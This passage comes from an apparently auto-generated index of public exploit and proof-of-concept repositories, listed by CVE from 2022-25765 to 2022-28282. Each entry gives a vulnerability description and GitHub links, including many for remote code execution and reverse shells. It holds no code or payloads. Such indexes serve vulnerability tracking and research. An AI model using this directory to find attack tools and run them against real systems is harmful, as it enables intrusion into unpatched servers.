- [PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell](https://github.com/PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell)
- [Wai-Yan-Kyaw/PDFKitExploit](https://github.com/Wai-Yan-Kyaw/PDFKitExploit)
- [LordRNA/CVE-2022-25765](https://github.com/LordRNA/CVE-2022-25765)
- [shamo0/PDFkit-CMD-Injection](https://github.com/shamo0/PDFkit-CMD-Injection)
- [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765](https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765)
- [UNICORDev/exploit-CVE-2022-25765](https://github.com/UNICORDev/exploit-CVE-2022-25765)
- [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection)
- [lowercasenumbers/CVE-2022-25765](https://github.com/lowercasenumbers/CVE-2022-25765)
### CVE-2022-25813 (2022-09-02)
In Apache OFBiz, versions 18.12.05 and earlier, an attacker acting as an anonymous user of the ecommerce plugin, can insert a malicious content in a message “Subject” field from the "Contact us" page. Then a party manager needs to list the communications in the party component to activate the SSTI. A RCE is then possible.
- [mbadanoiu/CVE-2022-25813](https://github.com/mbadanoiu/CVE-2022-25813)
### CVE-2022-25845 (2022-06-10)
The package com.alibaba:fastjson before 1.2.83 are vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: If upgrading is not possible, you can enable [safeMode](https://github.com/alibaba/fastjson/wiki/fastjson_safemode).
- [hosch3n/FastjsonVulns](https://github.com/hosch3n/FastjsonVulns)
- [nerowander/CVE-2022-25845-exploit](https://github.com/nerowander/CVE-2022-25845-exploit)
- [scabench/fastjson-tp1fn1](https://github.com/scabench/fastjson-tp1fn1)
### CVE-2022-25927 (2023-01-25)
Versions of the package ua-parser-js from 0.7.30 and before 0.7.33, from 0.8.1 and before 1.0.33 are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim() function.\r\r
- [masahiro331/cve-2022-25927](https://github.com/masahiro331/cve-2022-25927)
### CVE-2022-25943 (2022-03-09)
The installer of WPS Office for Windows versions prior to v11.2.0.10258 fails to configure properly the ACL for the directory where the service program is installed.
- [HadiMed/KINGSOFT-WPS-Office-LPE](https://github.com/HadiMed/KINGSOFT-WPS-Office-LPE)
- [webraybtl/CVE-2022-25943](https://github.com/webraybtl/CVE-2022-25943)
### CVE-2022-25949 (2022-03-17)
The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow.
- [tandasat/CVE-2022-25949](https://github.com/tandasat/CVE-2022-25949)
### CVE-2022-26133 (2022-04-20)
SharedSecretClusterAuthenticator in Atlassian Bitbucket Data Center versions 5.14.0 and later before 7.6.14, 7.7.0 and later prior to 7.17.6, 7.18.0 and later prior to 7.18.4, 7.19.0 and later prior to 7.19.4, and 7.20.0 allow a remote, unauthenticated attacker to execute arbitrary code via Java deserialization.
- [Pear1y/CVE-2022-26133](https://github.com/Pear1y/CVE-2022-26133)
- [0xAbbarhSF/CVE-2022-26133](https://github.com/0xAbbarhSF/CVE-2022-26133)
### CVE-2022-26134 (2022-06-03)
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
- [W01fh4cker/Serein](https://github.com/W01fh4cker/Serein)
- [offlinehoster/CVE-2022-26134](https://github.com/offlinehoster/CVE-2022-26134)
- [ma1am/CVE-2022-26134-Exploit-Detection](https://github.com/ma1am/CVE-2022-26134-Exploit-Detection)
- [jbaines-r7/through_the_wire](https://github.com/jbaines-r7/through_the_wire)
- [crowsec-edtech/CVE-2022-26134](https://github.com/crowsec-edtech/CVE-2022-26134)
- [kyxiaxiang/CVE-2022-26134](https://github.com/kyxiaxiang/CVE-2022-26134)
- [Brucetg/CVE-2022-26134](https://github.com/Brucetg/CVE-2022-26134)
- [shamo0/CVE-2022-26134](https://github.com/shamo0/CVE-2022-26134)
- [SNCKER/CVE-2022-26134](https://github.com/SNCKER/CVE-2022-26134)
- [Sakura-nee/CVE-2022-26134](https://github.com/Sakura-nee/CVE-2022-26134)
- [Vulnmachines/Confluence-CVE-2022-26134](https://github.com/Vulnmachines/Confluence-CVE-2022-26134)
- [axingde/CVE-2022-26134](https://github.com/axingde/CVE-2022-26134)
- [0xAgun/CVE-2022-26134](https://github.com/0xAgun/CVE-2022-26134)
- [abhishekmorla/CVE-2022-26134](https://github.com/abhishekmorla/CVE-2022-26134)
- [hev0x/CVE-2022-26134](https://github.com/hev0x/CVE-2022-26134)
- [archanchoudhury/Confluence-CVE-2022-26134](https://github.com/archanchoudhury/Confluence-CVE-2022-26134)
- [SIFalcon/confluencePot](https://github.com/SIFalcon/confluencePot)
- [CatAnnaDev/CVE-2022-26134](https://github.com/CatAnnaDev/CVE-2022-26134)
- [vesperp/CVE-2022-26134-Confluence](https://github.com/vesperp/CVE-2022-26134-Confluence)
- [li8u99/CVE-2022-26134](https://github.com/li8u99/CVE-2022-26134)
- [reubensammut/cve-2022-26134](https://github.com/reubensammut/cve-2022-26134)
- [BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL)
- [alcaparra/CVE-2022-26134](https://github.com/alcaparra/CVE-2022-26134)
- [whokilleddb/CVE-2022-26134-Confluence-RCE](https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE)
- [Habib0x0/CVE-2022-26134](https://github.com/Habib0x0/CVE-2022-26134)
- [Y000o/Confluence-CVE-2022-26134](https://github.com/Y000o/Confluence-CVE-2022-26134)
- [redhuntlabs/ConfluentPwn](https://github.com/redhuntlabs/ConfluentPwn)
- [cai-niao98/CVE-2022-26134](https://github.com/cai-niao98/CVE-2022-26134)
- [sunny-kathuria/exploit_CVE-2022-26134](https://github.com/sunny-kathuria/exploit_CVE-2022-26134)
- [KeepWannabe/BotCon](https://github.com/KeepWannabe/BotCon)
- [Chocapikk/CVE-2022-26134](https://github.com/Chocapikk/CVE-2022-26134)
- [AmoloHT/CVE-2022-26134](https://github.com/AmoloHT/CVE-2022-26134)
- [kh4sh3i/CVE-2022-26134](https://github.com/kh4sh3i/CVE-2022-26134)
- [ColdFusionX/CVE-2022-26134](https://github.com/ColdFusionX/CVE-2022-26134)
- [Luchoane/CVE-2022-26134_conFLU](https://github.com/Luchoane/CVE-2022-26134_conFLU)
- [r1skkam/TryHackMe-Atlassian-CVE-2022-26134](https://github.com/r1skkam/TryHackMe-Atlassian-CVE-2022-26134)
- [nxtexploit/CVE-2022-26134](https://github.com/nxtexploit/CVE-2022-26134)
- [Debajyoti0-0/CVE-2022-26134](https://github.com/Debajyoti0-0/CVE-2022-26134)
- [f4yd4-s3c/cve-2022-26134](https://github.com/f4yd4-s3c/cve-2022-26134)
- [coskper-papa/CVE-2022-26134](https://github.com/coskper-papa/CVE-2022-26134)
- [p4b3l1t0/confusploit](https://github.com/p4b3l1t0/confusploit)
- [twoning/CVE-2022-26134-PoC](https://github.com/twoning/CVE-2022-26134-PoC)
- [iveresk/cve-2022-26134](https://github.com/iveresk/cve-2022-26134)
- [keven1z/CVE-2022-26134](https://github.com/keven1z/CVE-2022-26134)
- [shiftsansan/CVE-2022-26134-Console](https://github.com/shiftsansan/CVE-2022-26134-Console)
- [1337in/CVE-2022-26134web](https://github.com/1337in/CVE-2022-26134web)
- [skhalsa-sigsci/CVE-2022-26134-LAB](https://github.com/skhalsa-sigsci/CVE-2022-26134-LAB)
- [yigexioabai/CVE-2022-26134-cve1](https://github.com/yigexioabai/CVE-2022-26134-cve1)
- [kailing0220/CVE-2022-26134](https://github.com/kailing0220/CVE-2022-26134)
- [xanszZZ/ATLASSIAN-Confluence_rce](https://github.com/xanszZZ/ATLASSIAN-Confluence_rce)
- [kelemaoya/CVE-2022-26134](https://github.com/kelemaoya/CVE-2022-26134)
- [CJ-0107/cve-2022-26134](https://github.com/CJ-0107/cve-2022-26134)
- [latings/CVE-2022-26134](https://github.com/latings/CVE-2022-26134)
- [yyqxi/CVE-2022-26134](https://github.com/yyqxi/CVE-2022-26134)
- [b4dboy17/CVE-2022-26134](https://github.com/b4dboy17/CVE-2022-26134)
- [wjlin0/CVE-2022-26134](https://github.com/wjlin0/CVE-2022-26134)
- [cbk914/CVE-2022-26134_check](https://github.com/cbk914/CVE-2022-26134_check)
- [MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell](https://github.com/MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell)
- [Muhammad-Ali007/Atlassian_CVE-2022-26134](https://github.com/Muhammad-Ali007/Atlassian_CVE-2022-26134)
- [acfirthh/CVE-2022-26134](https://github.com/acfirthh/CVE-2022-26134)
- [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134)
- [DARKSTUFF-LAB/-CVE-2022-26134](https://github.com/DARKSTUFF-LAB/-CVE-2022-26134)
- [404fu/CVE-2022-26134-POC](https://github.com/404fu/CVE-2022-26134-POC)
- [xsxtw/CVE-2022-26134](https://github.com/xsxtw/CVE-2022-26134)
- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
- [cc3305/CVE-2022-26134](https://github.com/cc3305/CVE-2022-26134)
- [Agentgilspy/CVE-2022-26134](https://github.com/Agentgilspy/CVE-2022-26134)
### CVE-2022-26135 (2022-06-30)
A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4.
- [assetnote/jira-mobile-ssrf-exploit](https://github.com/assetnote/jira-mobile-ssrf-exploit)
- [safe3s/CVE-2022-26135](https://github.com/safe3s/CVE-2022-26135)
### CVE-2022-26138 (2022-07-20)
The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.
- [alcaparra/CVE-2022-26138](https://github.com/alcaparra/CVE-2022-26138)
- [Vulnmachines/Confluence-Question-CVE-2022-26138-](https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-)
- [z92g/CVE-2022-26138](https://github.com/z92g/CVE-2022-26138)
- [shavchen/CVE-2022-26138](https://github.com/shavchen/CVE-2022-26138)
### CVE-2022-26159 (2022-02-28)
The auto-completion plugin in Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/<domain>/en.xml (and similar pathnames for other languages), which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
- [p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML](https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML)
### CVE-2022-26265 (2022-03-18)
Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter.
- [Inplex-sys/CVE-2022-26265](https://github.com/Inplex-sys/CVE-2022-26265)
- [redteamsecurity2023/CVE-2022-26265](https://github.com/redteamsecurity2023/CVE-2022-26265)
### CVE-2022-26269 (2022-03-29)
Suzuki Connect v1.0.15 allows attackers to tamper with displayed messages via spoofed CAN messages.
- [nsbogam/CVE-2022-26269](https://github.com/nsbogam/CVE-2022-26269)
### CVE-2022-26318 (2022-03-04)
On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.
- [misterxid/watchguard_cve-2022-26318](https://github.com/misterxid/watchguard_cve-2022-26318)
- [h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318](https://github.com/h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318)
- [BabyTeam1024/CVE-2022-26318](https://github.com/BabyTeam1024/CVE-2022-26318)
### CVE-2022-26377 (2022-06-08)
Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.
- [watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc](https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc)
### CVE-2022-26485 (2022-12-22)
Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0.
- [mistymntncop/CVE-2022-26485](https://github.com/mistymntncop/CVE-2022-26485)
### CVE-2022-26488 (2022-03-07)
In Python before 3.10.3 on Windows, local users can gain privileges because the search path is inadequately secured. The installer may allow a local attacker to add user-writable directories to the system search path. To exploit, an administrator must have installed Python for all users and enabled PATH entries. A non-administrative user can trigger a repair that incorrectly adds user-writable paths into PATH, enabling search-path hijacking of other users and system services. This affects Python (CPython) through 3.7.12, 3.8.x through 3.8.12, 3.9.x through 3.9.10, and 3.10.x through 3.10.2.
- [techspence/PyPATHPwner](https://github.com/techspence/PyPATHPwner)
### CVE-2022-26503 (2022-03-17)
Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges.
- [sinsinology/CVE-2022-26503](https://github.com/sinsinology/CVE-2022-26503)
### CVE-2022-26629 (2022-03-24)
An Access Control vulnerability exists in SoroushPlus+ Messenger 1.0.30 in the Lock Screen Security Feature function due to insufficient permissions and privileges, which allows a malicious attacker bypass the lock screen function.
- [scopion/CVE-2022-26629](https://github.com/scopion/CVE-2022-26629)
- [sysenter-eip/CVE-2022-26629](https://github.com/sysenter-eip/CVE-2022-26629)
### CVE-2022-26717 (2022-11-01)
A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution.
- [theori-io/CVE-2022-26717-Safari-WebGL-Exploit](https://github.com/theori-io/CVE-2022-26717-Safari-WebGL-Exploit)
### CVE-2022-26726 (2022-05-26)
This issue was addressed with improved checks. This issue is fixed in Security Update 2022-004 Catalina, watchOS 8.6, macOS Monterey 12.4, macOS Big Sur 11.6.6. An app may be able to capture a user's screen.
- [acheong08/CVE-2022-26726-POC](https://github.com/acheong08/CVE-2022-26726-POC)
- [acheong08/CVE-2022-26726-POC2](https://github.com/acheong08/CVE-2022-26726-POC2)
### CVE-2022-26757 (2022-05-26)
A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. An application may be able to execute arbitrary code with kernel privileges.
- [Dylbin/flow_divert](https://github.com/Dylbin/flow_divert)
### CVE-2022-26763 (2022-05-26)
An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious application may be able to execute arbitrary code with system privileges.
- [zhuowei/PCICrash](https://github.com/zhuowei/PCICrash)
### CVE-2022-26766 (2022-05-26)
A certificate parsing issue was addressed with improved checks. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious app may be able to bypass signature validation.
- [zhuowei/CoreTrustDemo](https://github.com/zhuowei/CoreTrustDemo)
### CVE-2022-26809 (2022-04-15)
Remote Procedure Call Runtime Remote Code Execution Vulnerability
- [sherlocksecurity/Microsoft-CVE-2022-26809-The-Little-Boy](https://github.com/sherlocksecurity/Microsoft-CVE-2022-26809-The-Little-Boy)
- [websecnl/CVE-2022-26809](https://github.com/websecnl/CVE-2022-26809)
- [auduongxuan/CVE-2022-26809](https://github.com/auduongxuan/CVE-2022-26809)
- [corelight/cve-2022-26809](https://github.com/corelight/cve-2022-26809)
- [quijadajose/CVE-2022-26809-RCE](https://github.com/quijadajose/CVE-2022-26809-RCE)
- [oppongjohn/CVE-2022-26809-RCE](https://github.com/oppongjohn/CVE-2022-26809-RCE)
- [yuanLink/CVE-2022-26809](https://github.com/yuanLink/CVE-2022-26809)
- [s1ckb017/PoC-CVE-2022-26809](https://github.com/s1ckb017/PoC-CVE-2022-26809)
- [fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp](https://github.com/fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp)
- [michealadams30/Cve-2022-26809](https://github.com/michealadams30/Cve-2022-26809)
### CVE-2022-26923 (2022-05-10)
Active Directory Domain Services Elevation of Privilege Vulnerability
- [r1skkam/TryHackMe-CVE-2022-26923](https://github.com/r1skkam/TryHackMe-CVE-2022-26923)
- [LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services)
- [lsecqt/CVE-2022-26923-Powershell-POC](https://github.com/lsecqt/CVE-2022-26923-Powershell-POC)
- [evilashz/PIGADVulnScanner](https://github.com/evilashz/PIGADVulnScanner)
- [Gh-Badr/CVE-2022-26923](https://github.com/Gh-Badr/CVE-2022-26923)
- [Yowise/CVE-2022-26923](https://github.com/Yowise/CVE-2022-26923)
### CVE-2022-26927 (2022-05-10)
Windows Graphics Component Remote Code Execution Vulnerability
- [CrackerCat/CVE-2022-26927](https://github.com/CrackerCat/CVE-2022-26927)
### CVE-2022-26937 (2022-05-10)
Windows Network File System Remote Code Execution Vulnerability
- [corelight/CVE-2022-26937](https://github.com/corelight/CVE-2022-26937)
- [omair2084/CVE-2022-26937](https://github.com/omair2084/CVE-2022-26937)
- [Malwareman007/CVE-2022-26937](https://github.com/Malwareman007/CVE-2022-26937)
### CVE-2022-26965 (2022-03-18)
In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution.
- [SkDevilS/Pluck-Exploitation-by-skdevils](https://github.com/SkDevilS/Pluck-Exploitation-by-skdevils)
### CVE-2022-27134 (2022-05-12)
EOSIO batdappboomx v327c04cf has an Access-control vulnerability in the `transfer` function of the smart contract which allows remote attackers to win the cryptocurrency without paying ticket fee via the `std::string memo` parameter.
- [Kenun99/CVE-batdappboomx](https://github.com/Kenun99/CVE-batdappboomx)
### CVE-2022-27226 (2022-03-19)
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.
- [SakuraSamuraii/ez-iRZ](https://github.com/SakuraSamuraii/ez-iRZ)
### CVE-2022-27251
- [TheCyberGeek/CVE-2022-27251](https://github.com/TheCyberGeek/CVE-2022-27251)
### CVE-2022-27254 (2022-03-23)
The remote keyless system on Honda Civic 2018 vehicles sends the same RF signal for each door-open request, which allows for a replay attack, a related issue to CVE-2019-20626.
- [nonamecoder/CVE-2022-27254](https://github.com/nonamecoder/CVE-2022-27254)
### CVE-2022-27255 (2022-08-01)
In Realtek eCos RSDK 1.5.7p1 and MSDK 4.9.4p1, the SIP ALG function that rewrites SDP data has a stack-based buffer overflow. This allows an attacker to remotely execute code without authentication via a crafted SIP packet that contains malicious SDP data.
- [infobyte/cve-2022-27255](https://github.com/infobyte/cve-2022-27255)
- [stryker-project/CVE-2022-27255-checker](https://github.com/stryker-project/CVE-2022-27255-checker)
### CVE-2022-27413 (2022-05-03)
Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.
- [HH1F/CVE-2022-27413](https://github.com/HH1F/CVE-2022-27413)
### CVE-2022-27414
- [lus33rr/CVE-2022-27414](https://github.com/lus33rr/CVE-2022-27414)
### CVE-2022-27434 (2022-07-17)
UNIT4 TETA Mobile Edition (ME) before 29.5.HF17 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page.
- [LongWayHomie/CVE-2022-27434](https://github.com/LongWayHomie/CVE-2022-27434)
### CVE-2022-27438 (2022-06-06)
Caphyon Ltd Advanced Installer 19.3 and earlier and many products that use the updater from Advanced Installer (Advanced Updater) are affected by a remote code execution vulnerability via the CustomDetection parameter in the update check function. To exploit this vulnerability, a user must start an affected installation to trigger the update check.
- [gerr-re/cve-2022-27438](https://github.com/gerr-re/cve-2022-27438)
### CVE-2022-27499 (2022-11-11)
Premature release of resource during expected lifetime in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.
- [StanPlatinum/snapshot-attack-demo](https://github.com/StanPlatinum/snapshot-attack-demo)
### CVE-2022-27502 (2022-06-10)
RealVNC VNC Server 6.9.0 through 5.1.0 for Windows allows local privilege escalation because an installer repair operation executes %TEMP% files as SYSTEM.
- [alirezac0/CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)
### CVE-2022-27518 (2022-12-13)
Unauthenticated remote arbitrary code execution\n
- [dolby360/CVE-2022-27518_POC](https://github.com/dolby360/CVE-2022-27518_POC)
### CVE-2022-27646 (2023-03-29)
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the circled daemon. A crafted circleinfo.txt file can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15879.
- [cyber-defence-campus/netgear_r6700v3_circled](https://github.com/cyber-defence-campus/netgear_r6700v3_circled)
### CVE-2022-27665 (2023-04-03)
Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.
- [dievus/CVE-2022-27665](https://github.com/dievus/CVE-2022-27665)
### CVE-2022-27666 (2022-03-23)
A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with a normal user privilege to overwrite kernel heap objects and may cause a local privilege escalation threat.
- [plummm/CVE-2022-27666](https://github.com/plummm/CVE-2022-27666)
- [Albocoder/cve-2022-27666-exploits](https://github.com/Albocoder/cve-2022-27666-exploits)
### CVE-2022-27772 (2022-03-30)
spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer
- [puneetbehl/grails3-cve-2022-27772](https://github.com/puneetbehl/grails3-cve-2022-27772)
### CVE-2022-27925 (2022-04-20)
Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.
- [vnhacker1337/CVE-2022-27925-PoC](https://github.com/vnhacker1337/CVE-2022-27925-PoC)
- [mohamedbenchikh/CVE-2022-27925](https://github.com/mohamedbenchikh/CVE-2022-27925)
- [miko550/CVE-2022-27925](https://github.com/miko550/CVE-2022-27925)
- [navokus/CVE-2022-27925](https://github.com/navokus/CVE-2022-27925)
- [Josexv1/CVE-2022-27925](https://github.com/Josexv1/CVE-2022-27925)
- [Chocapikk/CVE-2022-27925-Revshell](https://github.com/Chocapikk/CVE-2022-27925-Revshell)
- [akincibor/CVE-2022-27925](https://github.com/akincibor/CVE-2022-27925)
- [lolminerxmrig/CVE-2022-27925-Revshell](https://github.com/lolminerxmrig/CVE-2022-27925-Revshell)
- [touchmycrazyredhat/CVE-2022-27925-Revshell](https://github.com/touchmycrazyredhat/CVE-2022-27925-Revshell)
- [jam620/Zimbra](https://github.com/jam620/Zimbra)
- [Inplex-sys/CVE-2022-27925](https://github.com/Inplex-sys/CVE-2022-27925)
- [onlyHerold22/CVE-2022-27925-PoC](https://github.com/onlyHerold22/CVE-2022-27925-PoC)
- [sanan2004/CVE-2022-27925](https://github.com/sanan2004/CVE-2022-27925)
### CVE-2022-27927 (2022-04-19)
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.
- [erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated)
### CVE-2022-27997
- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997)
### CVE-2022-28077 (2022-05-11)
Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['s'] parameter.
- [bigzooooz/CVE-2022-28077](https://github.com/bigzooooz/CVE-2022-28077)
### CVE-2022-28078 (2022-05-11)
Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['page'] parameter.
- [bigzooooz/CVE-2022-28078](https://github.com/bigzooooz/CVE-2022-28078)
### CVE-2022-28079 (2022-05-05)
College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter.
- [erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated](https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated)
### CVE-2022-28080 (2022-05-05)
Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter.
- [erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated](https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated)
### CVE-2022-28099 (2022-05-04)
Poultry Farm Management System v1.0 was discovered to contain a SQL injection vulnerability via the Item parameter at /farm/store.php.
- [IbrahimEkimIsik/CVE-2022-28099](https://github.com/IbrahimEkimIsik/CVE-2022-28099)
### CVE-2022-28113 (2022-04-15)
An issue in upload.csp of FANTEC GmbH MWiD25-DS Firmware v2.000.030 allows attackers to write files and reset the user passwords without having a valid session cookie.
- [code-byter/CVE-2022-28113](https://github.com/code-byter/CVE-2022-28113)
### CVE-2022-28117 (2022-04-28)
A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter.
- [cheshireca7/CVE-2022-28117](https://github.com/cheshireca7/CVE-2022-28117)
- [kimstars/POC-CVE-2022-28117](https://github.com/kimstars/POC-CVE-2022-28117)
### CVE-2022-28118 (2022-05-03)
SiteServer CMS v7.x allows attackers to execute arbitrary code via a crafted plug-in.
- [Richard-Tang/SSCMS-PluginShell](https://github.com/Richard-Tang/SSCMS-PluginShell)
### CVE-2022-28132 (-)
The T-Soft E-Commerce 4 web application is susceptible to SQL injection (SQLi) attacks when authenticated as an admin or privileged user. This vulnerability allows attackers to access and manipulate the database through crafted requests. By exploiting this flaw, attackers can bypass authentication mechanisms, view sensitive information stored in the database, and potentially exfiltrate data.
- [alpernae/CVE-2022-28132](https://github.com/alpernae/CVE-2022-28132)
### CVE-2022-28171 (2022-06-27)
The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerability. Due to the insufficient input validation, attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device.
- [NyaMeeEain/CVE-2022-28171-POC](https://github.com/NyaMeeEain/CVE-2022-28171-POC)
### CVE-2022-28219 (2022-04-05)
Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
- [horizon3ai/CVE-2022-28219](https://github.com/horizon3ai/CVE-2022-28219)
- [rbowes-r7/manageengine-auditad-cve-2022-28219](https://github.com/rbowes-r7/manageengine-auditad-cve-2022-28219)
- [aeifkz/CVE-2022-28219-Like](https://github.com/aeifkz/CVE-2022-28219-Like)
### CVE-2022-28281 (2022-12-22)
If a compromised content process sent an unexpected number of WebAuthN Extensions in a Register command to the parent process, an out of bounds write would have occurred leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8.
- [0vercl0k/CVE-2022-28281](https://github.com/0vercl0k/CVE-2022-28281)
### CVE-2022-28282 (2022-12-22)
